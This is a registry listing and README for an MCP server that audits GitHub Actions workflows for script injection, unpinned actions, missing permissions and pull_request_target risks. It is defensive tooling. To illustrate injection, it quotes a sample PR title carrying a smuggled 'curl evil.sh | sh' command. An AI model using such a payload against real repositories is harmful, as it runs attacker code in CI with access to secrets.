Back to Browse

Github Actions Audit MCP Server

Cloud & DevOpsLow Risk10.0MCP RegistryRemote
Free

Server data from the Official MCP Registry

Audit GitHub Actions workflows for script injection, unpinned actions and missing permissions.

About

Audit GitHub Actions workflows for script injection, unpinned actions and missing permissions.

Remote endpoints: streamable-http: https://github-actions-audit-mcp.mcpize.run/mcp

Security Report

10.0
Low Risk10.0Low Risk

Valid MCP server (3 strong, 3 medium validity signals). No known CVEs in dependencies. Imported from the Official MCP Registry. Trust signals: trusted author (10/10 approved).

Endpoint verified · Requires authentication · 1 issue found

Security scores are indicators to help you make informed decisions, not guarantees. Always review permissions before connecting any MCP server.

Permissions Required

This plugin requests these system permissions. Most are normal for its category.

env_vars

Check that this permission is expected for this type of plugin.

file_system

Check that this permission is expected for this type of plugin.

HTTP Network Access

Connects to external APIs or services over the internet.

How to Connect

Remote Plugin

No local installation needed. Your AI client connects to the remote endpoint directly.

Add this to your MCP configuration to connect:

{
  "mcpServers": {
    "io-github-tylerscomic-lab-github-actions-audit-mcp": {
      "url": "https://github-actions-audit-mcp.mcpize.run/mcp"
    }
  }
}

Documentation

View on GitHub

From the project's GitHub README.

github-actions-audit-mcp

License: MIT Live on MCPize

An MCP server that audits GitHub Actions workflow YAML for the real vulnerability classes that have caused actual incidents — not a linter, a security scanner. Parses genuine YAML structure (a hand-written block parser scoped to what workflow files actually use), not string/regex matching against the raw file.

What it catches

Script injection. Any ${{ github.event.issue.title }}-style expression that carries attacker-controlled text (issue/PR titles, comments, review bodies, branch names) interpolated directly into a run: shell step. The expression is substituted into the generated shell script before the shell runs it — a PR titled "; curl evil.sh | sh # becomes literal shell syntax, not a string. This is the single most common real-world GitHub Actions vulnerability. Flags the exact expression and shows the env-variable fix that actually neutralizes it.

Unpinned third-party actions. uses: some-action@v4 or @main can be repointed by whoever controls that tag/branch, without you changing a single character in your workflow file — this is exactly what happened in the tj-actions/changed-files compromise (March 2025), where a maintainer's PAT was used to retag v35–v46 to point at a credential-harvesting commit. Only a full 40-character commit SHA is immutable.

Missing permissions: blocks. No explicit permissions: means the GITHUB_TOKEN defaults to whatever your repo/org settings allow — often read-write. If any step is ever compromised, it inherits that full scope.

pull_request_target + head checkout. This trigger runs with the base repo's secrets and a write-scoped token (unlike plain pull_request), and if the workflow also checks out the PR's own head commit, a fork's PR can run arbitrary code with your secrets. Real supply-chain incidents follow this exact pattern.

Tools

audit_workflow

Full audit of a workflow YAML file. Returns a risk level and every finding with its exact location, why it's dangerous, and a concrete fix.

check_expression_injection

Focused check on a single shell command string, for when you just want to sanity-check one run: step without a full workflow file.

Use it

Hosted (recommended): MCPize — free tier, $7/mo Pro.

Self-host:

npm install
node server.js

Part of a small suite

regex-safety-audit-mcp, mcp-trust-audit-mcp, secrets-leak-audit-mcp, dockerfile-audit-mcp.

License

MIT

Reviews

No reviews yet

Be the first to review this server!